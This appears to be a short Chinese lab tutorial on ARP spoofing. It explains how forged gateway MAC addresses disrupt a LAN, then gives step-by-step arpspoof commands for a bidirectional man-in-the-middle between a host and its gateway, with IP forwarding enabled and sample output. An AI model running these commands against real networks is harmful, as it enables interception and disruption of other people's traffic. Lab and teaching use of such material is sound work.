介绍:
由于局域网的网络流通不是根据IP地址进行,而是根据MAC地址进行传输。所以,MAC地址在A上被伪造成一个不存在的MAC地址,这样就会导致网络不通,A不能Ping通C!这就是一个简单的ARP欺骗。
第一种ARP欺骗的原理是——截获网关数据。它通知路由器一 系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址, 造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径 上网。在PC看来,就是上不了网了,“网络掉线了”
测试环境:
操作步骤:
1、在攻击主机B上安装arpspoof,sudo apt-get install dsniff
2、主机B用作ARP攻击欺骗,发起ARP包欺骗主机A网关MAC为客户机B网卡MAC:
arpspoof -t 192.168.2.166 192.168.2.254
18:3:73:43:af:7b b8:ae:ed:96:4c:54 0806 42: arp reply 192.168.2.254 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b b8:ae:ed:96:4c:54 0806 42: arp reply 192.168.2.254 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b b8:ae:ed:96:4c:54 0806 42: arp reply 192.168.2.254 is-at 18:3:73:43:af:7b
3、主机B欺骗网关主机A的MAC地址为主机B的MAC地址
arpspoof -t 192.168.2.254 192.168.2.166
18:3:73:43:af:7b 1c:df:f:b7:19:7f 0806 42: arp reply 192.168.2.166 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b 1c:df:f:b7:19:7f 0806 42: arp reply 192.168.2.166 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b 1c:df:f:b7:19:7f 0806 42: arp reply 192.168.2.166 is-at 18:3:73:43:af:7b
4、主机B开启数据包转发功能
echo 1 >/proc/sys/net/ipv4/ip_forward
预期结果:
网关tracert 主机A(需要先安装软件包 intsall traceroute )
traceroute 192.168.2.166
traceroute to 192.168.2.166 (192.168.2.166), 30 hops max, 60 byte packets
1 cdos.local (192.168.2.166) 0.348 ms 0.317 ms 0.306 ms